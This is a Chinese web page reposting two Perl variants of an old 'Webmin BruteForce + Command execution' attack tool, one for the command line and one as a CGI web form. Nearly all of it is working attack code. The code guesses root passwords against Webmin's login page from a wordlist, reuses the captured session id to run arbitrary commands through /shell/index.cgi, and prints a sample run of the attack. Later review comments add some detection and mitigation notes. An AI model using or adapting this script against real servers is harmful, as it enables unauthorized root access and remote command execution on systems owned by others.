Webmin 是一个广泛使用的、运行在 Linux/Unix 下、通过浏览器管理系统的工具。用它，你不必掌握复杂的命令行，也不必了解各种复杂的配置文件，系统管理变得非常简单：可以设置帐号、配置 DNS 和文件共享等。
Webmin BruteForce + Command execution v1.5
#!/usr/bin/perl
################################################################################
# Webmin BruteForce + Command execution
# v1.0:By Di42lo - _2@012.net.il">DiAblo_2@012.net.il
# v1.5:By ZzagorR - zzagorrzzagorr@hotmail.com - www.rootbinbash.com
################################################################################
#add script:
#1.wordlist func.
#2.log (line:41)
################################################################################
# usage:
# ./webmin1.pl <host> <command> <wordlist>
#./webmin1.pl 192.168.0.5 "uptime" wordlist.txt
# [+] BruteForcing...
# [+] trying to enter with: admim
# [+] trying to enter with: admin
# [+] Found SID : f3231ff32849fa0c8c98487ba8c09dbb
# [+] Password : admin
# [+] Connecting to host once again
# [+] Connected.. Sending Buffer
# [+] Buffer sent...running command uptime
# root logged into Webmin 1.170 on linux (SuSE Linux 9.1)
# 10:55pm up 23 days 9:03, 1 user, load average: 0.20, 0.05, 0.01
################################################################################

# NOTE(review): documentation pass only; the code below is unchanged (line
# breaks restored). This page holds two variants of the same 2005-era tool:
# a command-line script, followed (from the second "#!/usr/bin/perl") by a
# CGI wrapper around the same logic. Neither enables strict or warnings.
#
# What a defender sees: a burst of short-lived TCP connections to port 10000,
# each carrying a POST /session_login.cgi with user=root and one password
# candidate; after a "sid=" cookie comes back, a single multipart POST to
# /shell/index.cgi with fields cmd/pwd/history/previous/pcmd and pwd=/root.
# Repeated failed root logins to Webmin from one client are the detection
# signal; Webmin's failed-login lockout and disabling password login for root
# are the mitigations. On the machine running the CLI variant, a "<host>.log"
# file is left in the current directory.

use IO::Socket;

# Three positional arguments are required: target host, command to run,
# and the wordlist path. Anything less prints usage and exits.
if (@ARGV<3){
    print "Webmin BruteForcer v1.5\n";
    print "usage:\n";
    print " webmin15.pl <host> <command> <wordlist>\n";
    print "example:\n";
    print " webmin15.pl www.abcd.com \"id\" wordlist.txt\n";
    exit;
}
my $host=$ARGV[0];
my $cmd=$ARGV[1];
my $wlist=$ARGV[2];

# The wordlist is slurped whole, one candidate per line, through a bareword,
# two-argument, unchecked open; each element keeps its line terminator.
open (data, "$wlist");
@wordlist=<data>;
close data;
$passx=@wordlist;                       # number of candidates (scalar assignment)

# Local artifact of every run: "<host>.log" in the working directory, also
# opened two-argument and unchecked.
open(results , ">$host.log");
print results "#############################\n";
print results "Webmin BruteForce + Command execution v1.5\n";
print results "Host:$host\n";
print results "#############################\n";

my $chk=0;                              # becomes 1 once a "sid=" value is seen
# Single connect to TCP/10000 as a reachability probe; nothing is sent on it.
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10);
if(!$sock){
    print "[-] Webmin on this host does not exist\n";
    print results "[-] Webmin on this host does not exist\n";
    exit;
}else{
    $sock->close;
    print "[+] BruteForcing...\n";
}
my $sid;
$n=0;
# Guess loop: walks the wordlist from its last line towards the first and
# opens a fresh connection per candidate. Exits silently once the list is
# exhausted without a hit.
while ($chk!=1) {
    $n++;
    if($n>$passx){ exit; }
    $pass=@wordlist[$passx-$n];
    # Form-encoded login for the fixed account "root". "__" stands in for
    # Content-Length and is substituted after the body length is known.
    my $pass_line="page=%2F&user=root&pass=$pass";
    my $buffer="POST /session_login.cgi HTTP/1.0\n".
    "Host: $host:10000\n".
    "Keep-Alive: 300\n".
    "Connection: keep-alive\n".
    "Referer: http://$host:10000/\n".
    "Cookie: testing=1\n".
    "Content-Type: application/x-www-form-urlencoded\n".
    "Content-Length: __\n".
    "\n".
    $pass_line."\n\n";
    my $line_size=length($pass_line);
    $buffer=~s/__/$line_size/g;
    my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10);
    if ($sock){
        print "[+] trying to enter with: $pass\n";
        print $sock $buffer;
        # Success is inferred from a "sid=...;" fragment on any response
        # line; the greedy capture runs to the last ';' on that line.
        while ($answer=<$sock>){
            if ($answer=~/sid=(.*);/g){
                $chk=1;
                $sid=$1;
                print "[+] Found SID : $sid\n";
                print "[+] Password : $pass\n";
                print results "[+]:Password:$pass\nSid:$sid\n";
            }
        }
    }
    $sock->close;
    print results "[-]$pass\n";         # every candidate is logged, hit or miss
}

# Second phase: reuse the captured session id against /shell/index.cgi.
print "[+] Connecting to host once again\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10);
if(!$sock){
    print "[-] Cant Connect once again for command execution\n";
    print results "[-] Cant Connect once again for command execution\n";
}
print "[+] Connected.. Sending Buffer\n";
# Multipart body with a fixed boundary: cmd, pwd (always "/root"), an empty
# history, previous and pcmd. The command string is interpolated unescaped.
my $temp="-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"cmd\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pwd\"\n".
"\n".
"/root\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"history\"\n".
"\n".
"\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"previous\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604\n".
"Content-Disposition: form-data; name=\"pcmd\"\n".
"\n".
"$cmd\n".
"-----------------------------19777347561180971495777867604--\n\n";
my $buffer_size=length($temp);
# "siz" is the Content-Length placeholder; the substitution is global, so it
# also hits any other "siz" in the request.
$buffer="POST /shell/index.cgi HTTP/1.1\n".
"Host: $host:10000\n".
"Keep-Alive: 300\n".
"Connection: keep-alive\n".
"Referer: http://$host:10000/shell/\n".
"Cookie: sid=$sid\; testing=1; x\n".
"Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604\n".
"Content-Length: siz\n".
"\n".
$temp;
$buffer=~s/siz/$buffer_size/g;
print $sock $buffer;
if ($sock){
    print "[+] Buffer sent...running command $cmd\n";
    print $sock $buffer;                # the same request is written a second time
    # Output is scraped from the HTML: the defaultStatus string is printed,
    # then everything between "<td><pre><b>>" and "</pre></td></tr>".
    while ($answer=<$sock>){
        if ($answer=~/defaultStatus="(.*)";/g) { print $1."\n";}
        if ($answer=~/<td><pre><b>>/g){ $cmd_chk=1; }
        if ($cmd_chk==1) {
            if ($answer=~/<\/pre><\/td><\/tr>/g){ exit; }
            else { print $answer; print results "[+]$answer\n"; }
        }
    }
}

#!/usr/bin/perl
# CGI variant of the script above. Host, wordlist path and command all come
# straight from the HTTP request, so whoever can reach this CGI can drive it.
use CGI qw(:standard);
use IO::Socket;
$CGI::HEADERS_ONCE = 1;
$CGI = new CGI;
$atak = $CGI->param("atak");
$host = $CGI->param("host");
$wlist = $CGI->param("wlist");
$cmd = $CGI->param("cmd");
print $CGI->header(-type=>'text/html',-charset=>'windows-1254');
# Page header; the meta tag declares ISO-8859-9 while the HTTP header above
# says windows-1254.
print qq~<html><head><meta http-equiv=Content-Type" content=text/html; charset=ISO-8859-9><title>Webmin Web Brute Force v1.5 - cgi versiyon</title></head> <body bgcolor=black text=red>Webmin Web Brute Force v1.5 - cgi versiyon<br> <font color=blue> Webmin BruteForce + Command execution- cgi version<br> v1.0:By Di42lo - _2@012.net.ilDiAblo_2@012.net.il<br> v1.5:By ZzagorR - zzagorrzzagorr@hotmail.com - www.rootbinbash.com<br> </font>~;

if($atak eq "webmin") {
    # The "wlist" parameter is opened as a local path on the CGI host with
    # a two-argument open, i.e. the request controls what file is read.
    open (data, "$wlist");
    @wordlist=<data>;
    close data;
    $passx=@wordlist;
    $chk=0;
    # Reachability probe; here a failure dies (message goes to the server
    # error log) instead of printing.
    $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25) || die "[-] Webmin on this host does not exist\r\n";
    $sock->close;
    print "[+] BruteForcing...<br>";
    $sid;                               # bare expression; declares nothing
    $n=0;
    # Same guess loop as the CLI variant, minus the log file and with a
    # 25-second connect timeout.
    while ($chk!=1) {
        $n++;
        if($n>$passx){ exit; }
        $pass=@wordlist[$passx-$n];
        $pass_line="page=%2F&user=root&pass=$pass";
        $buffer="POST /session_login.cgi HTTP/1.0\n".
        "Host: $host:10000\n".
        "Keep-Alive: 300\n".
        "Connection: keep-alive\n".
        "Referer: http://$host:10000/\n".
        "Cookie: testing=1\n".
        "Content-Type: application/x-www-form-urlencoded\n".
        "Content-Length: __\n".
        "\n".
        $pass_line."\n\n";
        $line_size=length($pass_line);
        $buffer=~s/__/$line_size/g;
        $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25);
        if ($sock){
            print "[+] Denenen sifre: $pass<br>";    # Turkish: "password tried"
            print $sock $buffer;
            while ($answer=<$sock>){
                if ($answer=~/sid=(.*);/g){
                    $chk=1;
                    $sid=$1;
                    print "[+] Found SID : $sid<br>";
                    print "[+] Sifre : $pass<br>";   # Turkish: "password"
                }
            }
        }
        $sock->close;
    }
    print "[+] Connecting to host once again<br>";
    $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10) || die "[-] Cant Connect once again for command execution\n";
    print "[+] Connected.. Sending Buffer<br>";
    # Multipart body identical to the CLI variant's.
    $temp="-----------------------------19777347561180971495777867604\n".
    "Content-Disposition: form-data; name=\"cmd\"\n".
    "\n".
    "$cmd\n".
    "-----------------------------19777347561180971495777867604\n".
    "Content-Disposition: form-data; name=\"pwd\"\n".
    "\n".
    "/root\n".
    "-----------------------------19777347561180971495777867604\n".
    "Content-Disposition: form-data; name=\"history\"\n".
    "\n".
    "\n".
    "-----------------------------19777347561180971495777867604\n".
    "Content-Disposition: form-data; name=\"previous\"\n".
    "\n".
    "$cmd\n".
    "-----------------------------19777347561180971495777867604\n".
    "Content-Disposition: form-data; name=\"pcmd\"\n".
    "\n".
    "$cmd\n".
    "-----------------------------19777347561180971495777867604--\n\n";
    $buffer_size=length($temp);
    $buffer="POST /shell/index.cgi HTTP/1.1\n".
    "Host: $host:10000\n".
    "Keep-Alive: 300\n".
    "Connection: keep-alive\n".
    "Referer: http://$host:10000/shell/\n".
    "Cookie: sid=$sid\; testing=1; x\n".
    "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604\n".
    "Content-Length: siz\n".
    "\n".
    $temp;
    $buffer=~s/siz/$buffer_size/g;
    print $sock $buffer;
    if ($sock){
        print "[+] Buffer sent...running command $cmd<br>";
        print $sock $buffer;            # written a second time, as in the CLI variant
        # Scraped command output is echoed to the browser without escaping.
        while ($answer=<$sock>){
            if ($answer=~/defaultStatus="(.*)";/g) { print $1."<br>";}
            if ($answer=~/<td><pre><b>>/g){ $cmd_chk=1; }
            if ($cmd_chk==1) {
                if ($answer=~/<\/pre><\/td><\/tr>/g){ exit; }
                else { print $answer; }
            }
        }
    }
}
# No "atak" parameter: render the input form. Note the misspelt "aciton"
# attribute in the literal, and that the file input is submitted without a
# multipart enctype, so only a name reaches the wlist parameter.
# NOTE(review): the closing brace of this if-block is not on the page.
if($atak eq ""){
    print qq~ <table align=left cellspacing="0" cellpading="0"><form aciton=?><input type=hidden name=atak value=webmin> <tr><td colspan="3" align=center>Webmin Web Brute Force v1.5 - cgi version</td></tr> <tr><td>Server:</td><td colspan="2"><input type="text" name="host" size="50" value="www."></td></tr> <tr><td valign="top">Wordlist:</td><td valign="top"><input type="file" name="wlist"></td><td valign="top" align="left">Examples:<br>---------<br>admin<br>administrator<br>redhat<br>mandrake<br>suse<br></td></tr> <tr><td>Cmd:</td><td colspan="2"><input type="text" name="cmd" size="50" value="uptime"></td></tr> <tr><td colspan="3" align="center"><input type="submit" name="" value="Gooooooo!"></td></tr> </form></table></body></html>~;
摘自:http://lams.blogchina.com

OVER